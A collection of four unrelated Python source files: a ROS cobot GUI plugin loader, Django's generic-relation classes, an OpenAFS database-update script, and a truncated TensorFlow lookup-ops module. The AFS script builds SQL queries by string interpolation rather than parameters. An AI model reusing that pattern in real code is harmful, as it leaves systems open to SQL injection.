self._context.getLogger().err(str(ex))
return None
plugin_dir = get_pkg_dir(plugin_pkg_name)
plugin_descriptor_file = os.path.join(plugin_dir,"plugin_descriptor.xml")
if not os.path.isfile(plugin_descriptor_file):
self._context.getLogger().err('Cannot found plugin_descriptor.xml into plugin %s'%plugin_name)
return None
plugin_descriptor_root = ElementTree.parse(plugin_descriptor_file).getroot()
plugin_import = plugin_descriptor_root.find('import')
plugin_module_path = plugin_import.attrib['module']
plugin_class_name = plugin_import.attrib['class']
sys.path.append(os.path.join(plugin_dir,self.PLUGIN_SOURCES_LOCATION))
plugin_class_ref = None
try:
#Import plugin package module
module = __builtin__.__import__(plugin_module_path,
fromlist=[plugin_class_name],
level=0)
except Exception as ex:
self._context.getLogger().err("Cannot import plugin '%s' !\n%s"%(plugin_name, str(ex)))
return None
#Get referance to plugin class
plugin_class_ref = getattr(module, plugin_class_name)
if plugin_class_ref is None:
self._context.getLogger().err("Cannot found plugin class '%s' !"%plugin_class_name)
return None
plugin_instance = plugin_class_ref(self._context)
plugin_params = PluginProvider.getParameters(plugin_descriptor_root, plugin_node)
plugin_instance.setup(plugin_descriptor_root, plugin_params)
return plugin_instance
@staticmethod
def getParameters(plugin_descriptor, plugin_node):
parameters = Parameters()
# Try to provide plugin parameters in plugin_descriptor.xml
descriptor_params = plugin_descriptor.find("setup/parameters")
# Add parameters, if parameters found in plugin_descriptor.xml
if descriptor_params is not None:
for param in descriptor_params:
# Append parameters
parameters.putParam(param.attrib['name'], param.attrib['value'])
if plugin_node is not None:
# Check if parameters remapped in airbus_cobot_gui config launch
if plugin_node.find("param") is not None:
for param in plugin_node.iter('param'):
# Update or append parameters
parameters.putParam(param.attrib['name'], param.attrib['value'])
return parameters
class PluginsGroupPopup(QAgiPopup):
def __init__(self, parent):
QAgiPopup.__init__(self, parent)
self._context = parent.getContext()
self.setAttribute(Qt.WA_TranslucentBackground)
self.setFixedWidth(100)
self.setRelativePosition(QAgiPopup.TopLeft, QAgiPopup.TopRight)
self._launchers_layout = QVBoxLayout(self)
self._launchers_layout.setContentsMargins(2, 2, 2, 2)
self._launchers_layout.setSpacing(15)
def setupLaunchers(self, launchers):
for launcher in launchers:
self.connect(launcher, SIGNAL('clicked()'), self.close)
self._launchers_layout.addWidget(launcher)
class PluginsGroup(QPushButton):
def __init__(self, parent, xgroup):
QPushButton.__init__(self, parent)
self.setFocusPolicy(Qt.NoFocus)
self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)
self.setIconSize(QSize(80,80))
self.setEnabled(False)
self._context = parent.getContext()
self._context.addUserEventListener(self.onUserChanged)
self._min_access_rights = 3
self._launchers = []
self.setup(xgroup)
def setup(self, xgroup):
group_name = ""
icon_path = ""
try:
group_name = xgroup.attrib['name']
icon_path = xgroup.attrib['icon']
except:
self._context.getLogger().err("Not name or icon found for plugin group !")
return
icon_path = get_pkg_dir_from_prefix(icon_path)
if os.path.isfile(icon_path):
self.setIcon(QIcon(icon_path))
else:
self.setStyleSheet("background-color:rgba(255,0,0,80%);\
border-radius: 10px;\
font-size: 12pt;\
font-weight:60;\
color: #ffffff;")
self.setText(group_name)
def add(self, launcher):
launcher.setStyleSheet("background:none;")#R.values.styles.no_background)
self._launchers.append(launcher)
if launcher.getAccessRights() < self._min_access_rights:
self._min_access_rights = launcher.getAccessRights()
def getContext(self):
self._context
def onUserChanged(self, user):
if user.getUserPrivilege() < self._min_access_rights:
self.setEnabled(False)
else:
self.setEnabled(True)
def mousePressEvent(self, event):
popup = PluginsGroupPopup(self)
popup.setupLaunchers(self._launchers)
popup.show_()
##Unittest
if __name__ == "__main__":
from python_qt_binding.QtGui import *
from python_qt_binding.QtCore import *
from airbus_cobot_gui.context import Context
rospy.init_node('plugin_privider_test')
a = QApplication(sys.argv)
utt_appli = QMainWindow()
context = Context(utt_appli)
provider = PluginProvider(context, "/home/nhg/AIRBUS/airbus_coop/src/airbus_coop/src/gui/plugins/plugins_register.xml")
plugin = provider.getPluginInstance("SSM")
utt_appli.setCentralWidget(plugin)
plugin.onStart()
utt_appli.show()
a.exec_()
#End of file
| |
"""
Classes allowing "generic" relations through ContentType and object-id fields.
"""
from __future__ import unicode_literals
from collections import defaultdict
from functools import partial
from django.core.exceptions import ObjectDoesNotExist
from django.db import connection
from django.db import models, router, DEFAULT_DB_ALIAS
from django.db.models import signals
from django.db.models.fields.related import ForeignObject, ForeignObjectRel
from django.db.models.related import PathInfo
from django.db.models.sql.where import Constraint
from django.forms import ModelForm, ALL_FIELDS
from django.forms.models import (BaseModelFormSet, modelformset_factory, save_instance,
modelform_defines_fields)
from django.contrib.admin.options import InlineModelAdmin, flatten_fieldsets
from django.contrib.contenttypes.models import ContentType
from django.utils import six
from django.utils.deprecation import RenameMethodsBase
from django.utils.encoding import smart_text
class RenameGenericForeignKeyMethods(RenameMethodsBase):
renamed_methods = (
('get_prefetch_query_set', 'get_prefetch_queryset', PendingDeprecationWarning),
)
class GenericForeignKey(six.with_metaclass(RenameGenericForeignKeyMethods)):
"""
Provides a generic relation to any object through content-type/object-id
fields.
"""
def __init__(self, ct_field="content_type", fk_field="object_id", for_concrete_model=True):
self.ct_field = ct_field
self.fk_field = fk_field
self.for_concrete_model = for_concrete_model
self.editable = False
def contribute_to_class(self, cls, name):
self.name = name
self.model = cls
self.cache_attr = "_%s_cache" % name
cls._meta.add_virtual_field(self)
# For some reason I don't totally understand, using weakrefs here doesn't work.
signals.pre_init.connect(self.instance_pre_init, sender=cls, weak=False)
# Connect myself as the descriptor for this field
setattr(cls, name, self)
def instance_pre_init(self, signal, sender, args, kwargs, **_kwargs):
"""
Handles initializing an object with the generic FK instead of
content-type/object-id fields.
"""
if self.name in kwargs:
value = kwargs.pop(self.name)
kwargs[self.ct_field] = self.get_content_type(obj=value)
kwargs[self.fk_field] = value._get_pk_val()
def get_content_type(self, obj=None, id=None, using=None):
if obj is not None:
return ContentType.objects.db_manager(obj._state.db).get_for_model(
obj, for_concrete_model=self.for_concrete_model)
elif id:
return ContentType.objects.db_manager(using).get_for_id(id)
else:
# This should never happen. I love comments like this, don't you?
raise Exception("Impossible arguments to GFK.get_content_type!")
def get_prefetch_queryset(self, instances):
# For efficiency, group the instances by content type and then do one
# query per model
fk_dict = defaultdict(set)
# We need one instance for each group in order to get the right db:
instance_dict = {}
ct_attname = self.model._meta.get_field(self.ct_field).get_attname()
for instance in instances:
# We avoid looking for values if either ct_id or fkey value is None
ct_id = getattr(instance, ct_attname)
if ct_id is not None:
fk_val = getattr(instance, self.fk_field)
if fk_val is not None:
fk_dict[ct_id].add(fk_val)
instance_dict[ct_id] = instance
ret_val = []
for ct_id, fkeys in fk_dict.items():
instance = instance_dict[ct_id]
ct = self.get_content_type(id=ct_id, using=instance._state.db)
ret_val.extend(ct.get_all_objects_for_this_type(pk__in=fkeys))
# For doing the join in Python, we have to match both the FK val and the
# content type, so we use a callable that returns a (fk, class) pair.
def gfk_key(obj):
ct_id = getattr(obj, ct_attname)
if ct_id is None:
return None
else:
model = self.get_content_type(id=ct_id,
using=obj._state.db).model_class()
return (model._meta.pk.get_prep_value(getattr(obj, self.fk_field)),
model)
return (ret_val,
lambda obj: (obj._get_pk_val(), obj.__class__),
gfk_key,
True,
self.cache_attr)
def is_cached(self, instance):
return hasattr(instance, self.cache_attr)
def __get__(self, instance, instance_type=None):
if instance is None:
return self
try:
return getattr(instance, self.cache_attr)
except AttributeError:
rel_obj = None
# Make sure to use ContentType.objects.get_for_id() to ensure that
# lookups are cached (see ticket #5570). This takes more code than
# the naive ``getattr(instance, self.ct_field)``, but has better
# performance when dealing with GFKs in loops and such.
f = self.model._meta.get_field(self.ct_field)
ct_id = getattr(instance, f.get_attname(), None)
if ct_id:
ct = self.get_content_type(id=ct_id, using=instance._state.db)
try:
rel_obj = ct.get_object_for_this_type(pk=getattr(instance, self.fk_field))
except ObjectDoesNotExist:
pass
setattr(instance, self.cache_attr, rel_obj)
return rel_obj
def __set__(self, instance, value):
ct = None
fk = None
if value is not None:
ct = self.get_content_type(obj=value)
fk = value._get_pk_val()
setattr(instance, self.ct_field, ct)
setattr(instance, self.fk_field, fk)
setattr(instance, self.cache_attr, value)
class GenericRelation(ForeignObject):
"""Provides an accessor to generic related objects (e.g. comments)"""
def __init__(self, to, **kwargs):
kwargs['verbose_name'] = kwargs.get('verbose_name', None)
kwargs['rel'] = GenericRel(
self, to, related_name=kwargs.pop('related_name', None),
limit_choices_to=kwargs.pop('limit_choices_to', None),)
# Override content-type/object-id field names on the related class
self.object_id_field_name = kwargs.pop("object_id_field", "object_id")
self.content_type_field_name = kwargs.pop("content_type_field", "content_type")
self.for_concrete_model = kwargs.pop("for_concrete_model", True)
kwargs['blank'] = True
kwargs['editable'] = False
kwargs['serialize'] = False
# This construct is somewhat of an abuse of ForeignObject. This field
# represents a relation from pk to object_id field. But, this relation
# isn't direct, the join is generated reverse along foreign key. So,
# the from_field is object_id field, to_field is pk because of the
# reverse join.
super(GenericRelation, self).__init__(
to, to_fields=[],
from_fields=[self.object_id_field_name], **kwargs)
def resolve_related_fields(self):
self.to_fields = [self.model._meta.pk.name]
return [(self.rel.to._meta.get_field_by_name(self.object_id_field_name)[0],
self.model._meta.pk)]
def get_reverse_path_info(self):
opts = self.rel.to._meta
target = opts.get_field_by_name(self.object_id_field_name)[0]
return [PathInfo(self.model._meta, opts, (target,), self.rel, True, False)]
def get_choices_default(self):
return super(GenericRelation, self).get_choices(include_blank=False)
def value_to_string(self, obj):
qs = getattr(obj, self.name).all()
return smart_text([instance._get_pk_val() for instance in qs])
def get_joining_columns(self, reverse_join=False):
if not reverse_join:
# This error message is meant for the user, and from user
# perspective this is a reverse join along the GenericRelation.
raise ValueError('Joining in reverse direction not allowed.')
return super(GenericRelation, self).get_joining_columns(reverse_join)
def contribute_to_class(self, cls, name):
super(GenericRelation, self).contribute_to_class(cls, name, virtual_only=True)
# Save a reference to which model this class is on for future use
self.model = cls
# Add the descriptor for the relation
setattr(cls, self.name, ReverseGenericRelatedObjectsDescriptor(self, self.for_concrete_model))
def contribute_to_related_class(self, cls, related):
pass
def set_attributes_from_rel(self):
pass
def get_internal_type(self):
return "ManyToManyField"
def get_content_type(self):
"""
Returns the content type associated with this field's model.
"""
return ContentType.objects.get_for_model(self.model,
for_concrete_model=self.for_concrete_model)
def get_extra_restriction(self, where_class, alias, remote_alias):
field = self.rel.to._meta.get_field_by_name(self.content_type_field_name)[0]
contenttype_pk = self.get_content_type().pk
cond = where_class()
cond.add((Constraint(remote_alias, field.column, field), 'exact', contenttype_pk), 'AND')
return cond
def bulk_related_objects(self, objs, using=DEFAULT_DB_ALIAS):
"""
Return all objects related to ``objs`` via this ``GenericRelation``.
"""
return self.rel.to._base_manager.db_manager(using).filter(**{
"%s__pk" % self.content_type_field_name:
ContentType.objects.db_manager(using).get_for_model(
self.model, for_concrete_model=self.for_concrete_model).pk,
"%s__in" % self.object_id_field_name:
[obj.pk for obj in objs]
})
class ReverseGenericRelatedObjectsDescriptor(object):
"""
This class provides the functionality that makes the related-object
managers available as attributes on a model class, for fields that have
multiple "remote" values and have a GenericRelation defined in their model
(rather than having another model pointed *at* them). In the example
"article.publications", the publications attribute is a
ReverseGenericRelatedObjectsDescriptor instance.
"""
def __init__(self, field, for_concrete_model=True):
self.field = field
self.for_concrete_model = for_concrete_model
def __get__(self, instance, instance_type=None):
if instance is None:
return self
# Dynamically create a class that subclasses the related model's
# default manager.
rel_model = self.field.rel.to
superclass = rel_model._default_manager.__class__
RelatedManager = create_generic_related_manager(superclass)
qn = connection.ops.quote_name
content_type = ContentType.objects.db_manager(instance._state.db).get_for_model(
instance, for_concrete_model=self.for_concrete_model)
join_cols = self.field.get_joining_columns(reverse_join=True)[0]
manager = RelatedManager(
model = rel_model,
instance = instance,
source_col_name = qn(join_cols[0]),
target_col_name = qn(join_cols[1]),
content_type = content_type,
content_type_field_name = self.field.content_type_field_name,
object_id_field_name = self.field.object_id_field_name,
prefetch_cache_name = self.field.attname,
)
return manager
def __set__(self, instance, value):
manager = self.__get__(instance)
manager.clear()
for obj in value:
manager.add(obj)
def create_generic_related_manager(superclass):
"""
Factory function for a manager that subclasses 'superclass' (which is a
Manager) and adds behavior for generic related objects.
"""
class GenericRelatedObjectManager(superclass):
def __init__(self, model=None, instance=None, symmetrical=None,
source_col_name=None, target_col_name=None, content_type=None,
content_type_field_name=None, object_id_field_name=None,
prefetch_cache_name=None):
super(GenericRelatedObjectManager, self).__init__()
self.model = model
self.content_type = content_type
self.symmetrical = symmetrical
self.instance = instance
self.source_col_name = source_col_name
self.target_col_name = target_col_name
self.content_type_field_name = content_type_field_name
self.object_id_field_name = object_id_field_name
self.prefetch_cache_name = prefetch_cache_name
self.pk_val = self.instance._get_pk_val()
self.core_filters = {
'%s__pk' % content_type_field_name: content_type.id,
'%s__exact' % object_id_field_name: instance._get_pk_val(),
}
def get_queryset(self):
try:
return self.instance._prefetched_objects_cache[self.prefetch_cache_name]
except (AttributeError, KeyError):
db = self._db or router.db_for_read(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).get_queryset().using(db).filter(**self.core_filters)
def get_prefetch_queryset(self, instances):
db = self._db or router.db_for_read(self.model, instance=instances[0])
query = {
'%s__pk' % self.content_type_field_name: self.content_type.id,
'%s__in' % self.object_id_field_name:
set(obj._get_pk_val() for obj in instances)
}
qs = super(GenericRelatedObjectManager, self).get_queryset().using(db).filter(**query)
# We (possibly) need to convert object IDs to the type of the
# instances' PK in order to match up instances:
object_id_converter = instances[0]._meta.pk.to_python
return (qs,
lambda relobj: object_id_converter(getattr(relobj, self.object_id_field_name)),
lambda obj: obj._get_pk_val(),
False,
self.prefetch_cache_name)
def add(self, *objs):
for obj in objs:
if not isinstance(obj, self.model):
raise TypeError("'%s' instance expected" % self.model._meta.object_name)
setattr(obj, self.content_type_field_name, self.content_type)
setattr(obj, self.object_id_field_name, self.pk_val)
obj.save()
add.alters_data = True
def remove(self, *objs):
db = router.db_for_write(self.model, instance=self.instance)
for obj in objs:
obj.delete(using=db)
remove.alters_data = True
def clear(self):
db = router.db_for_write(self.model, instance=self.instance)
for obj in self.all():
obj.delete(using=db)
clear.alters_data = True
def create(self, **kwargs):
kwargs[self.content_type_field_name] = self.content_type
kwargs[self.object_id_field_name] = self.pk_val
db = router.db_for_write(self.model, instance=self.instance)
return super(GenericRelatedObjectManager, self).using(db).create(**kwargs)
create.alters_data = True
return GenericRelatedObjectManager
class GenericRel(ForeignObjectRel):
def __init__(self, field, to, related_name=None, limit_choices_to=None):
super(GenericRel, self).__init__(field, to, related_name, limit_choices_to)
class BaseGenericInlineFormSet(BaseModelFormSet):
"""
A formset for generic inline objects to a parent.
"""
def __init__(self, data=None, files=None, instance=None, save_as_new=None,
prefix=None, queryset=None, **kwargs):
opts = self.model._meta
self.instance = instance
self.rel_name = '-'.join((
opts.app_label, opts.model_name,
self.ct_field.name, self.ct_fk_field.name,
))
if self.instance is None or self.instance.pk is None:
qs = self.model._default_manager.none()
else:
if queryset is None:
queryset = self.model._default_manager
qs = queryset.filter(**{
self.ct_field.name: ContentType.objects.get_for_model(
self.instance, for_concrete_model=self.for_concrete_model),
self.ct_fk_field.name: self.instance.pk,
})
super(BaseGenericInlineFormSet, self).__init__(
queryset=qs, data=data, files=files,
prefix=prefix,
**kwargs
)
@classmethod
def get_default_prefix(cls):
opts = cls.model._meta
return '-'.join((opts.app_label, opts.model_name,
cls.ct_field.name, cls.ct_fk_field.name,
))
def save_new(self, form, commit=True):
kwargs = {
self.ct_field.get_attname(): ContentType.objects.get_for_model(
self.instance, for_concrete_model=self.for_concrete_model).pk,
self.ct_fk_field.get_attname(): self.instance.pk,
}
new_obj = self.model(**kwargs)
return save_instance(form, new_obj, commit=commit)
def generic_inlineformset_factory(model, form=ModelForm,
formset=BaseGenericInlineFormSet,
ct_field="content_type", fk_field="object_id",
fields=None, exclude=None,
extra=3, can_order=False, can_delete=True,
max_num=None,
formfield_callback=None, validate_max=False,
for_concrete_model=True):
"""
Returns a ``GenericInlineFormSet`` for the given kwargs.
You must provide ``ct_field`` and ``fk_field`` if they are different from
the defaults ``content_type`` and ``object_id`` respectively.
"""
opts = model._meta
# if there is no field called `ct_field` let the exception propagate
ct_field = opts.get_field(ct_field)
if not isinstance(ct_field, models.ForeignKey) or ct_field.rel.to != ContentType:
raise Exception("fk_name '%s' is not a ForeignKey to ContentType" % ct_field)
fk_field = opts.get_field(fk_field) # let the exception propagate
if exclude is not None:
exclude = list(exclude)
exclude.extend([ct_field.name, fk_field.name])
else:
exclude = [ct_field.name, fk_field.name]
FormSet = modelformset_factory(model, form=form,
formfield_callback=formfield_callback,
formset=formset,
extra=extra, can_delete=can_delete, can_order=can_order,
fields=fields, exclude=exclude, max_num=max_num,
validate_max=validate_max)
FormSet.ct_field = ct_field
FormSet.ct_fk_field = fk_field
FormSet.for_concrete_model = for_concrete_model
return FormSet
class GenericInlineModelAdmin(InlineModelAdmin):
ct_field = "content_type"
ct_fk_field = "object_id"
formset = BaseGenericInlineFormSet
def get_formset(self, request, obj=None, **kwargs):
if 'fields' in kwargs:
fields = kwargs.pop('fields')
else:
fields = flatten_fieldsets(self.get_fieldsets(request, obj))
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
exclude.extend(self.get_readonly_fields(request, obj))
if self.exclude is None and hasattr(self.form, '_meta') and self.form._meta.exclude:
# Take the custom ModelForm's Meta.exclude into account only if the
# GenericInlineModelAdmin doesn't define its own.
exclude.extend(self.form._meta.exclude)
exclude = exclude or None
can_delete = self.can_delete and self.has_delete_permission(request, obj)
defaults = {
"ct_field": self.ct_field,
"fk_field": self.ct_fk_field,
"form": self.form,
"formfield_callback": partial(self.formfield_for_dbfield, request=request),
"formset": self.formset,
"extra": self.extra,
"can_delete": can_delete,
"can_order": False,
"fields": fields,
"max_num": self.max_num,
"exclude": exclude
}
defaults.update(kwargs)
if defaults['fields'] is None and not modelform_defines_fields(defaults['form']):
defaults['fields'] = ALL_FIELDS
return generic_inlineformset_factory(self.model, **defaults)
class GenericStackedInline(GenericInlineModelAdmin):
template = 'admin/edit_inline/stacked.html'
class GenericTabularInline(GenericInlineModelAdmin):
template = 'admin/edit_inline/tabular.html'
| |
#!/usr/bin/python
import cProfile
import time,logging
import argparse, string,datetime,sys
import afs
from afs.util.AfsConfig import parseDefaultConfig
from afs.util.DBManager import DBManager
from afs.service.OSDVolService import OSDVolService
from afs.service.OSDCellService import OSDCellService
from afs.service.OSDFsService import OSDFsService
from afs.service.DBsService import DBsService
from afs.service.ProjectService import ProjectService
from afs.model.Volume import Volume
from afs.model.Partition import Partition
from afs.model.ExtendedPartitionAttributes import ExtPartAttr
from afs.lla.UbikPeerLLA import UbikPeerLLA
from afs.lla.OSDVolumeLLA import OSDVolumeLLA
myParser=argparse.ArgumentParser(parents=[afs.argParser], add_help=False)
myParser.add_argument("--force", action='store_true',default=False, help="force re-check")
myParser.add_argument("--create", action='store_true',default=False, help="create new DB.")
myParser.add_argument("--onlySP", default="", help="check only server_partition")
myParser.add_argument("--stat", action='store_true', default=False, help="do not query live-system, but only update DB-internal sums")
parseDefaultConfig(myParser)
VLLA=OSDVolumeLLA()
CS=OSDCellService()
FS=OSDFsService()
VS=OSDVolService()
DBsS=DBsService()
DBM=DBManager()
PS=ProjectService()
ULLA=UbikPeerLLA()
def main() :
if afs.defaultConfig.create :
use_cache=False
else :
use_cache=True
VLDBup2date=False
# if we have a specified partition, do only just hat.
if afs.defaultConfig.onlySP != "" :
# full update
f,p=afs.defaultConfig.onlySP.split("_")
print "Server: {0}".format(f)
FileServer=FS.getFileServer(name_or_ip=f,cached=use_cache)
if p == "*" :
partnames=FileServer.parts.keys()
partnames.sort()
else :
partnames=[p,]
for part in partnames :
print "part: {0}".format(part)
do_updatePartition(FileServer,f,part,use_cache)
sys.exit(0)
# update DB-internal sums only
if afs.defaultConfig.stat :
cachedCell=CS.getCellInfo(cached=True)
for f in cachedCell.FileServers :
print "Server: {0}".format(f)
FileServer=FS.getFileServer(name_or_ip=f,cached=True)
partnames=FileServer.parts.keys()
for part in partnames :
print "part: {0}".format(part)
do_update_ExtPartAttr(FileServer,part)
sys.exit(0)
if not afs.defaultConfig.create :
cachedCell=CS.getCellInfo(cached=True)
liveCell=CS.getCellInfo(cached=False)
# live_VLDBVersion=ULLA.getShortInfo(cachedCell.DBServers[0],7003,None,None)["SyncSiteDBVersion"]
# update if required
if cachedCell :
if "%s" % cachedCell.VLDBVersion == "%s" % liveCell.VLDBVersion :
print "VLDB Versions considered equal (cached: '{0}',live:'{1}').".format(cachedCell.VLDBVersion,liveCell.VLDBVersion)
VLDBup2date = True
else :
print "VLDB Versions differ ('{0}' != '{1}').".format(cachedCell.VLDBVersion,liveCell.VLDBVersion)
VLDBup2date = False
else :
VLDBup2date = True
else :
liveCell=CS.getCellInfo(cached=False)
# first update DBServer
for db in liveCell.DBServers :
print "Server: {0}".format(db)
VLDBServer=DBsS.getDBServer(db,"vldb")
PTDBServer=DBsS.getDBServer(db,"ptdb")
ignoreFS=[]
# then FileServer
for f in liveCell.FileServers :
print "Server: {0}".format(f)
try :
FileServer=FS.getFileServer(name_or_ip=f)
except:
ignoreFS.append(f)
if not afs.defaultConfig.force :
if afs.defaultConfig.create :
print "Re-creation of Database forced."
else :
if VLDBup2date :
print "Don't update"
sys.exit(0)
else :
if afs.defaultConfig.create :
print "Re-creation of Database forced."
else :
print "Update forced."
if not afs.defaultConfig.create :
# check volume-list of all sever partitions and compare live and db-lists
# to see what has changed
for f in liveCell.FileServers :
print "Server: {0}".format(f)
if f in ignoreFS :
print "ignored because of previous error."
continue
FileServer=FS.getFileServer(name_or_ip=f)
partnames=FileServer.parts.keys()
partnames.sort()
for part in partnames :
print "part: {0}...".format(part),
vols_live=FS.getVolumeIDs(f,part=part,cached=False)
vols_live.sort()
vols_cached=[]
for v in DBM.executeRaw('SELECT vid FROM tbl_volume WHERE serv_uuid="%s" AND part="%s";' % (FileServer.uuid,part)).fetchall() :
vols_cached.append(v[0])
vols_cached.sort()
if vols_cached != vols_live :
print "modified, updating..."
# XXX here, we should just update the volumes which changed
do_updatePartition(FileServer,f,part,use_cache)
else :
print "OK"
else : # do full update of all volumes
# full update
for f in liveCell.FileServers :
print "Server: {0}".format(f)
if f in ignoreFS :
print "ignored because of previous error."
continue
FileServer=FS.getFileServer(name_or_ip=f,cached=use_cache)
partnames=FileServer.parts.keys()
partnames.sort()
for part in partnames :
print "part: {0}".format(part)
do_updatePartition(FileServer,f,part,use_cache)
sys.exit(0)
def do_updatePartition(FileServer,f,part,use_cache) :
# update all Volume information in DB
# this includes ExtVolAttr and ExtVolAttr_OSD
FS.bulk_cacheVolumes(f,part)
do_update_ExtPartAttr(FileServer,part)
return
def do_update_ExtPartAttr(FileServer,part) :
# get time 6 Months ago
StaleDate=datetime.timedelta(days=-183)
dateStale=datetime.datetime(1970, 1, 1).now()+StaleDate
# allocated is tricky, we want to use single ROs, but not accompanying RO's.
# get stats for RW
#FS.DBManager.Logger.setLevel(logging.DEBUG)
SQL='SELECT SUM(maxquota) FROM tbl_volume WHERE updateDate < "%s" AND type="RW" AND serv_uuid="%s" AND part="%s"' % (dateStale,FileServer.uuid,part)
allocated_stale=FS.DBManager.executeRaw(SQL).fetchone()[0]
if allocated_stale == None :
allocated_stale = 0
#FS.DBManager.Logger.setLevel(logging.WARN)
SQL='SELECT SUM(maxquota) FROM tbl_volume WHERE type="RW" AND serv_uuid="%s" AND part="%s"' % (FileServer.uuid,part)
allocated=FS.DBManager.executeRaw(SQL).fetchone()[0]
if allocated == None :
allocated = 0
SQL='SELECT COUNT(maxquota) FROM tbl_volume WHERE type="RW" AND serv_uuid="%s" AND part="%s" AND maxquota="0"' % (FileServer.uuid,part)
unLimitedVolumes=FS.DBManager.executeRaw(SQL).fetchone()[0]
# get stats for single RO
SQL='SELECT SUM(maxquota) FROM (SELECT type,parentID,maxquota FROM tbl_volume WHERE updateDate < "%s" AND serv_uuid="%s" AND part="%s" GROUP BY parentID HAVING COUNT(parentID) = 1) as T1 WHERE T1.type="RO";' % (dateStale,FileServer.uuid,part)
_allo=FS.DBManager.executeRaw(SQL).fetchone()[0]
if _allo == None : _allo = 0
allocated_stale += _allo
SQL='SELECT SUM(maxquota) FROM (SELECT type,parentID,maxquota FROM tbl_volume WHERE serv_uuid="%s" AND part="%s" GROUP BY parentID HAVING COUNT(parentID) = 1) as T1 WHERE T1.type="RO";' % (FileServer.uuid,part)
_allo=FS.DBManager.executeRaw(SQL).fetchone()[0]
if _allo == None : _allo = 0
allocated += _allo
SQL='SELECT COUNT(maxquota) FROM (SELECT type,parentID,maxquota FROM tbl_volume WHERE serv_uuid="%s" AND part="%s" AND maxquota ="0" GROUP BY parentID HAVING COUNT(parentID) = 1) as T1 WHERE T1.type="RO";' % (FileServer.uuid,part)
unLimitedVolumes=FS.DBManager.executeRaw(SQL).fetchone()[0]
numRW,numRO,numBK,numOffline=FS.getNumVolumes(name_or_ip=FileServer.servernames[0],part=part,cached=True)
projectIDs={}
ExtPart=ExtPartAttr(FileServer.uuid,part)
ExtPart.allocated=allocated
ExtPart.allocated_stale=allocated_stale
ExtPart.unLimitedVolumes=unLimitedVolumes
#FS.Logger.setLevel(logging.DEBUG)
#FS.DBManager.Logger.setLevel(logging.DEBUG)
#FS.Logger.setLevel(logging.WARN)
#FS.DBManager.Logger.setLevel(logging.WARN)
ExtPart.numRW=numRW
ExtPart.numRO=numRO
ExtPart.numBK=numBK
ExtPart.numOffline=numOffline
ExtPart.projectIDs=projectIDs
FS.DBManager.setIntoCache(ExtPartAttr,ExtPart,serv_uuid=FileServer.uuid,name=part)
print "server %s part %s: numRW=%s, numRO=%s,numBK=%s,numOffline=%s,allocated=%s,allocated_stale=%s" % (FileServer.servernames[0],part,numRW,numRO,numBK,numOffline,allocated,allocated_stale)
return
if __name__=="__main__" :
#cProfile.run('main()',"updateDB.prof")
main()
| |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#==============================================================================
"""Lookup operations."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import six
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import string_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_lookup_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.util import compat
from tensorflow.python.util.deprecation import deprecated
from tensorflow.python.util.tf_export import tf_export
@tf_export("initialize_all_tables")
@deprecated(None, "Use `tf.tables_initializer` instead.")
def initialize_all_tables(name="init_all_tables"):
"""Returns an Op that initializes all tables of the default graph.
Args:
name: Optional name for the initialization op.
Returns:
An Op that initializes all tables. Note that if there are
not tables the returned Op is a NoOp.
"""
return tables_initializer(name)
@tf_export("tables_initializer")
def tables_initializer(name="init_all_tables"):
"""Returns an Op that initializes all tables of the default graph.
Args:
name: Optional name for the initialization op.
Returns:
An Op that initializes all tables. Note that if there are
not tables the returned Op is a NoOp.
"""
initializers = ops.get_collection(ops.GraphKeys.TABLE_INITIALIZERS)
if initializers:
return control_flow_ops.group(*initializers, name=name)
return control_flow_ops.no_op(name=name)
def _check_table_dtypes(table, key_dtype, value_dtype):
"""Check that the given key_dtype and value_dtype matches the table dtypes.
Args:
table: The table to check types against to.
key_dtype: The key data type to check.
value_dtype: The value data type to check.
Raises:
TypeError: when 'key_dtype' or 'value_dtype' doesn't match the table data
types.
"""
if key_dtype.base_dtype != table.key_dtype:
raise TypeError("Invalid key dtype, expected %s but got %s." %
(table.key_dtype, key_dtype))
if value_dtype.base_dtype != table.value_dtype:
raise TypeError("Invalid value dtype, expected %s but got %s." %
(table.value_dtype, value_dtype))
class LookupInterface(object):
"""Represent a lookup table that persists across different steps."""
def __init__(self, key_dtype, value_dtype, name):
"""Construct a lookup table interface.
Args:
key_dtype: The table key type.
value_dtype: The table value type.
name: A name for the operation (optional).
"""
self._key_dtype = dtypes.as_dtype(key_dtype)
self._value_dtype = dtypes.as_dtype(value_dtype)
self._name = name
@property
def key_dtype(self):
"""The table key dtype."""
return self._key_dtype
@property
def value_dtype(self):
"""The table value dtype."""
return self._value_dtype
@property
def name(self):
"""The name of the table."""
return self._name
@property
def init(self):
"""The table initialization op."""
raise NotImplementedError
def size(self, name=None):
"""Compute the number of elements in this table."""
raise NotImplementedError
def lookup(self, keys, name=None):
"""Looks up `keys` in a table, outputs the corresponding values."""
raise NotImplementedError
class InitializableLookupTableBase(LookupInterface):
"""Initializable lookup table interface.
An initializable lookup tables persist across different steps.
"""
def __init__(self, table_ref, default_value, initializer):
"""Construct a table object from a table reference.
If requires a table initializer object (subclass of `TableInitializerBase`).
It provides the table key and value types, as well as the op to initialize
the table. The caller is responsible to execute the initialization op.
Args:
table_ref: The table reference, i.e. the output of the lookup table ops.
default_value: The value to use if a key is missing in the table.
initializer: The table initializer to use.
"""
if context.executing_eagerly():
